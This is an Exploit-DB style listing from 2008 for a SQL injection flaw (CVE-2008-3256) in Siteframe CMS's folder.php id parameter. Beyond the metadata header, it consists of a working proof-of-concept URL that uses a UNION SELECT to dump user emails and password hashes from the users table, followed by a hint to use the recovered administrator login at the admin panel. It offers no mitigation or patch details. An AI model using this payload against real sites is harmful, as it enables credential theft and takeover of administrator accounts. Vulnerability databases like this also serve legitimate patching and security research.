Siteframe folder.php id Remote SQL Injection Vulnerability

2008-07-18T00:00:00
ID EDB-ID:6099
Type exploitdb
Reporter n0ne
Modified 2008-07-18T00:00:00

Description

Siteframe (folder.php id) Remote SQL Injection Vulnerability. CVE-2008-3256. Webapps exploit for php platform

                                        
                                            #################################################
#################################################
##SQL-Injection in Siteframe CMS (all versions)##
#################################################
#################################################

##############
#Author: n0ne##############
#E-Mail: qwerty@ebanat.com#
###########################

###############################
#Vulnerable script: folder.php#
#Vulnerable var: id############
####################

########################################
#CMS Homepage: http://www.siteframe.org#
########################################

##########################################################################################################################################################
#Exploit PoC: #http://www.target.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11# #+from+users--#                                                                                                                                                                                           ########################################################################################################################
##########################################################################################################################################################

#########################################################################################################
#Admin panel: http://www.target.com/admin/ (but previously you gotta log in as administrator on website)#
#########################################################################################################

###################################################
#############Greetz to www.antichat.ru#############
############And personally to Nilson ;)############
###################################################

# milw0rm.com [2008-07-18]